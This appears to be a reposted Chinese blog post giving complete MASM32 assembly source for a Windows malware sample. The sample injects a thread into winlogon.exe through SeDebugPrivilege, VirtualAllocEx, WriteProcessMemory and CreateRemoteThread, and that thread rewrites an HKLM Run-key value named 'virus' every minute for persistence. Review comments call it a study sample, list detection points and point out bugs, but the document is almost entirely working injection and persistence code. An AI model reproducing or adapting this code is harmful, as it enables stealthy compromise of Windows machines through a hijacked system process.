小说每一分钟

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42020181/article/details/80010153


注入winlogon(每一分钟写入注册表启动项一次自身的文件路径)

02-07

; Main.asm:
; =====================================================================
; Main.asm  -- MASM32, 32-bit (.386), flat model, stdcall
;
; Purpose, as written: enable SeDebugPrivilege on the current token,
; find winlogon.exe with a ToolHelp snapshot, allocate an RWX region
; inside it, copy the REMOTE_CODE_START..REMOTE_CODE_END template from
; RemoteThread.asm (plus four kernel32 function pointers and this
; executable's own path) into that region, and start the template's
; _RemoteThread there.  The remote thread then loops forever, writing
; HKLM\Software\Microsoft\Windows\CurrentVersion\Run\virus = <own path>
; once every 60 seconds.
;
; SECURITY NOTE (review): this is a textbook process-injection plus
; Run-key persistence sample.  Every step is a detection point for a
; defender: SeDebugPrivilege enabled by a non-debugger, OpenProcess on
; winlogon.exe, VirtualAllocEx with PAGE_EXECUTE_READWRITE,
; WriteProcessMemory + CreateRemoteThread into a system process, and a
; Run-key write whose calling process is winlogon.exe.  Study only; do
; not deploy.
;
; Defects left in place (code is byte-identical; see NOTE(review) lines):
;   - snapshot loop never terminates if winlogon.exe is not found
;   - CreateToolhelp32Snapshot handle is never closed
;   - _RemoteThread keeps its loop counter in EDX across an API call
;   - RegSetValueExA writes the whole 256-byte buffer, not strlen+1
;   - no return-value checks on token, snapshot or registry APIs
; Assumes 32-bit Windows: a 32-bit image cannot inject into a native
; 64-bit winlogon.exe -- presumably written for XP-era systems; confirm.
; =====================================================================
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
include advapi32.inc
include th32.inc
includelib kernel32.lib
includelib user32.lib
includelib advapi32.lib
includelib th32.lib

.data?
; The first five variables below are copied verbatim into the remote
; buffer (second WriteProcessMemory in start:).  Their order and sizes
; must match _lpGetProcAddress.._lpFileName in RemoteThread.asm exactly.
lpGetProcAddress dd ?                     ; kernel32 function pointers handed to the remote thread
lpGetModuleHandle dd ?
lplstrlen dd ?
lpSleep dd ?
lpFileName db 256 dup (?)                 ; this executable's own path; becomes the Run-key value
lpRemoteCode dd ?                         ; base of the region VirtualAllocEx'd inside winlogon
hModule dd ?
hToken dd ?
hProcess dd ?
hToolHelp dd ?
stTkp TOKEN_PRIVILEGES <>                 ; used to enable SeDebugPrivilege
stProcess PROCESSENTRY32 <>               ; ToolHelp entry used while scanning for winlogon
dwWinlogon dd ?                           ; PID of winlogon.exe
dwTemp dd ?                               ; receives WriteProcessMemory's bytes-written count (never checked)

.const
szKernelDll db 'kernel32.dll',0
szGetProcAddress db 'GetProcAddress',0
szGetModuleHandle db 'GetModuleHandleA',0
szlstrlen db 'lstrlenA',0
szSleep db 'Sleep',0
szErrOpen db 'Can not open thread',0ah,0dh,0
szDebugName db 'SeDebugPrivilege',0
szWinlogonName db 'winlogon.exe',0

.code
include RemoteThread.asm                  ; template lives in .code so it is copyable as bytes

start:
;*********************************************************************
; Resolve the kernel32 exports the remote thread needs and record our own
; file name.  The original comment justifies this by "kernel32.dll is
; shared by all processes", i.e. the resolved addresses are assumed to be
; valid inside winlogon as well.  NOTE(review): that holds only while
; kernel32 is mapped at the same base in both processes -- true per boot
; session on ASLR systems, but it is an assumption, not a guarantee.
;*********************************************************************
        invoke GetModuleHandle,offset szKernelDll;
        mov hModule,eax
        invoke GetProcAddress,hModule,offset szGetProcAddress
        mov lpGetProcAddress,eax
        invoke GetProcAddress,hModule,offset szGetModuleHandle
        mov lpGetModuleHandle,eax
        invoke GetProcAddress,hModule,offset szlstrlen
        mov lplstrlen,eax                 ; NOTE(review): copied to the remote thread but never called there
        invoke GetProcAddress,hModule,offset szSleep
        mov lpSleep,eax
        invoke GetModuleFileName,NULL,addr lpFileName,sizeof lpFileName
;*************************************************************************
; Enable SeDebugPrivilege on our own token; without it OpenProcess on
; winlogon (a SYSTEM process) fails.  NOTE(review): none of the three
; calls is checked, so a non-admin caller only finds out at OpenProcess.
;*************************************************************************
        invoke GetCurrentProcess
        invoke OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,addr hToken
        invoke LookupPrivilegeValue,NULL,offset szDebugName,addr stTkp.Privileges[0].Luid
        mov stTkp.PrivilegeCount,1
        mov stTkp.Privileges[0].Attributes,SE_PRIVILEGE_ENABLED
        invoke AdjustTokenPrivileges,hToken,FALSE,addr stTkp,NULL,NULL,NULL
;***************************************************************************
; Find winlogon's PID via a process snapshot.
; NOTE(review): ebx holds only Process32First's result and is never updated,
; so the .while condition is constant; the loop exits solely through .break.
; If no entry compares equal to "winlogon.exe" (Process32Next keeps
; returning FALSE, leaving stProcess stale) this spins forever.  The entry
; returned by Process32First itself is never compared (overwritten by
; Process32Next before the lstrcmp).  lstrcmp is case-sensitive.
; The snapshot handle hToolHelp is never closed.
;***************************************************************************
        invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,NULL
        mov hToolHelp,eax
        mov stProcess.dwSize,sizeof stProcess
        invoke Process32First,hToolHelp,addr stProcess
        mov ebx,eax
        .while ebx==TRUE
        mov stProcess.dwSize,sizeof stProcess   ; dwSize must be reset before every Process32Next
        invoke Process32Next,hToolHelp,addr stProcess
        lea edx,stProcess.szExeFile
        invoke lstrcmp,edx,offset szWinlogonName
        .if eax==0
        push stProcess.th32ProcessID
        pop dwWinlogon
        .break
        .endif
        .endw
;***************************************************************************
; Open winlogon, allocate an RWX region, copy the template and start it.
; NOTE(review): the access mask omits PROCESS_QUERY_INFORMATION and
; PROCESS_VM_READ, which CreateRemoteThread's documentation lists as
; required on later Windows versions -- confirm on the target OS.
;***************************************************************************
        invoke OpenProcess,PROCESS_VM_OPERATION or PROCESS_VM_WRITE or PROCESS_CREATE_THREAD,FALSE,dwWinlogon
        .if eax
        mov hProcess,eax
        invoke VirtualAllocEx,hProcess,NULL,REMOTE_CODE_LENGTH,MEM_COMMIT,PAGE_EXECUTE_READWRITE
        .if eax
        mov lpRemoteCode,eax
        ; 1) copy the whole template (data block + _RemoteThread code) as raw bytes
        invoke WriteProcessMemory,hProcess,lpRemoteCode,offset REMOTE_CODE_START,\
        REMOTE_CODE_LENGTH,addr dwTemp
        ; 2) overwrite the head of the template with the four function pointers
        ;    (4 dwords) followed by our path: lstrlen(path) + 16 bytes starting at
        ;    lpGetProcAddress.  The terminating NUL is NOT part of this copy; the
        ;    template's zero-initialised _lpFileName bytes are relied on for it.
        invoke lstrlen,offset lpFileName
        add eax,sizeof dword*4
        invoke WriteProcessMemory,hProcess,lpRemoteCode,offset lpGetProcAddress,\
        eax,addr dwTemp
        ; entry point = remote base + (_RemoteThread's offset within the template)
        mov eax,lpRemoteCode
        add eax,offset _RemoteThread-offset REMOTE_CODE_START
        invoke CreateRemoteThread,hProcess,NULL,NULL,eax,0,0,NULL
        invoke CloseHandle,eax            ; eax = thread handle, or NULL on failure (then CloseHandle just fails)
        .endif
        invoke CloseHandle,hProcess
        .else
        invoke MessageBox,NULL,offset szErrOpen,NULL,MB_OK or MB_ICONWARNING
        .endif
        invoke ExitProcess,NULL
        end start

; RemoteThread.asm:
; =====================================================================
; RemoteThread.asm -- position-independent payload copied into winlogon.
;
; Everything between REMOTE_CODE_START and REMOTE_CODE_END is copied as
; one byte blob, so the data below is addressed at run time as
; [ebx + link-time offset], where ebx = (remote address - link address)
; computed by the call/pop "delta offset" at the top of _RemoteThread.
; Field order of _lpGetProcAddress.._lpFileName must match the .data?
; variables lpGetProcAddress..lpFileName in Main.asm (they are copied
; over this head by the injector).
; =====================================================================
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
REMOTE_CODE_START equ this byte
_lpGetProcAddress dd ?                    ; filled in by the injector
_lpGetModuleHandle dd ?                   ; filled in by the injector
_lplstrlen dd ?                           ; filled in by the injector; never called below
_lpSleep dd ?                             ; filled in by the injector
_lpFileName db 256 dup (?)                ; filled in by the injector (own path, no explicit NUL copied)
_lpRegOpenKeyEx dd ?                      ; resolved at run time from advapi32
_lpRegSetValueEx dd ?
_lpRegCloseKey dd ?
_szAdvapiDll db 'advapi32.dll',0
_szRegOpenKeyEx db 'RegOpenKeyExA',0
_szRegSetValueEx db 'RegSetValueExA',0
_szRegCloseKey db 'RegCloseKey',0
_szSubKey db 'Software\Microsoft\Windows\CurrentVersion\Run',0
_szKeyName db 'virus',0                   ; Run value name written every cycle
_szKeyValue db 'dirlt',0                  ; NOTE(review): declared but never referenced
_hKey dd ?
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;---------------------------------------------------------------------
; _RemoteThread(lParam) -- thread entry run inside winlogon.exe.
; Never returns: rewrites the Run value every 60 s until the process dies.
; Registers: ebx = delta offset (base fixup), edi/esi = scratch for the
; GetProcAddress loop; all three are saved by the "uses" clause.
;---------------------------------------------------------------------
_RemoteThread proc uses ebx edi esi lParam
        local @hModule:dword
        ; delta offset: ebx = actual address of @@ minus its link-time address
        call @f
@@:
        pop ebx
        sub ebx,offset @b
;********************************************************
; Resolve RegOpenKeyExA / RegSetValueExA / RegCloseKey from advapi32.
; The three name strings are laid out back to back, so after each
; GetProcAddress esi is advanced past the NUL to the next name and edi
; to the next pointer slot.
; NOTE(review): edx is the loop counter but is not preserved across
; GetProcAddress (caller-saved under stdcall); this works by luck at best.
;********************************************************
        lea eax,[ebx+offset _szAdvapiDll]
        push eax
        call [ebx+_lpGetModuleHandle]
        mov @hModule,eax
        lea edi,[ebx+_lpRegOpenKeyEx]
        lea esi,[ebx+_szRegOpenKeyEx]
        mov edx,3
        .repeat
        push esi
        push @hModule
        call [ebx+_lpGetProcAddress]
        mov [edi],eax
        add edi,4
@@:
        lodsb                             ; skip to the byte after the name's NUL
        or al,al
        jnz @b
        dec edx
        .until edx==0
;*******************************************************
; Persistence loop: every 60 seconds (Sleep 60000 -- not "every second"
; as the original comment said) open HKLM\...\Run with KEY_ALL_ACCESS
; and set value "virus" = own path.
; NOTE(review): RegOpenKeyExA's result is not checked (a stale _hKey is
; reused on failure), and cbData is sizeof _lpFileName (256), so the full
; buffer, not strlen+1, is stored as REG_SZ.
;*******************************************************
        .while TRUE
        lea eax,[ebx+offset _hKey]
        push eax
        push KEY_ALL_ACCESS
        push 0
        lea eax,[ebx+offset _szSubKey]
        push eax
        push HKEY_LOCAL_MACHINE
        call [ebx+_lpRegOpenKeyEx]
        push sizeof _lpFileName
        lea eax,[ebx+_lpFileName]
        push eax
        push REG_SZ
        push 0
        lea eax,[ebx+_szKeyName]
        push eax
        push [ebx+offset _hKey]
        call [ebx+_lpRegSetValueEx]
        push [ebx+offset _hKey]
        call [ebx+_lpRegCloseKey]
        push 60000
        call [ebx+_lpSleep]
        .endw
        ret                               ; unreachable: the loop above never exits
_RemoteThread endp
REMOTE_CODE_END equ this byte
REMOTE_CODE_LENGTH equ offset REMOTE_CODE_END-offset REMOTE_CODE_START
